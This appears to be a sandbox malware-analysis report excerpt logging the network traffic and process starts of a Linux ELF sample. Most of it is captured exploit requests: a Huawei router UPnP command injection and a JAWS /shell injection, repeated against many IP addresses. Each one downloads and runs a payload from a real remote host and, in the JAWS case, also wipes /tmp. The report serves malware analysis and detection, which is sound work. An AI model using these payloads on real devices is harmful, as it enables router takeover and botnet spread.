                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                138192.168.2.234215260.178.102.14180
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:54.006259918 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                139192.168.2.2353344156.100.250.17037215
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:54.060225964 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Content-Length: 430
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                140192.168.2.2356676197.199.137.23237215
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:54.061105013 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Content-Length: 430
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                141192.168.2.2344256156.219.192.22337215
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:54.061804056 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Content-Length: 430
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                142192.168.2.2335002197.81.175.20637215
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:54.062454939 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Content-Length: 430
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                143192.168.2.235076241.67.28.5537215
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:54.063186884 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Content-Length: 430
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                144192.168.2.2348634156.210.38.12737215
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:54.063873053 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Content-Length: 430
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                145192.168.2.2350676156.13.215.13237215
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:54.064564943 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Content-Length: 430
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                146192.168.2.2344398150.222.20.6580
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:54.116460085 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                147192.168.2.235802242.222.254.7080
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:54.117126942 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                148192.168.2.235480089.137.176.14180
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:54.117696047 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                149192.168.2.234299282.147.27.11380
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:54.118252993 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                System Behavior

                                                Start time (UTC):21:16:43
                                                Start date (UTC):03/12/2024
                                                Path:/tmp/x86_64.elf
                                                Arguments:/tmp/x86_64.elf
                                                File size:68352 bytes
                                                MD5 hash:88660446811d50c52341472f9b03d870

                                                Start time (UTC):21:16:43
                                                Start date (UTC):03/12/2024
                                                Path:/tmp/x86_64.elf
                                                Arguments:-
                                                File size:68352 bytes
                                                MD5 hash:88660446811d50c52341472f9b03d870

                                                Start time (UTC):21:16:43
                                                Start date (UTC):03/12/2024
                                                Path:/tmp/x86_64.elf
                                                Arguments:-
                                                File size:68352 bytes
                                                MD5 hash:88660446811d50c52341472f9b03d870

                                                Start time (UTC):21:16:43
                                                Start date (UTC):03/12/2024
                                                Path:/tmp/x86_64.elf
                                                Arguments:-
                                                File size:68352 bytes
                                                MD5 hash:88660446811d50c52341472f9b03d870

                                                Start time (UTC):21:16:43
                                                Start date (UTC):03/12/2024
                                                Path:/tmp/x86_64.elf
                                                Arguments:-
                                                File size:68352 bytes
                                                MD5 hash:88660446811d50c52341472f9b03d870

                                                Start time (UTC):21:16:43
                                                Start date (UTC):03/12/2024
                                                Path:/tmp/x86_64.elf
                                                Arguments:-
                                                File size:68352 bytes
                                                MD5 hash:88660446811d50c52341472f9b03d870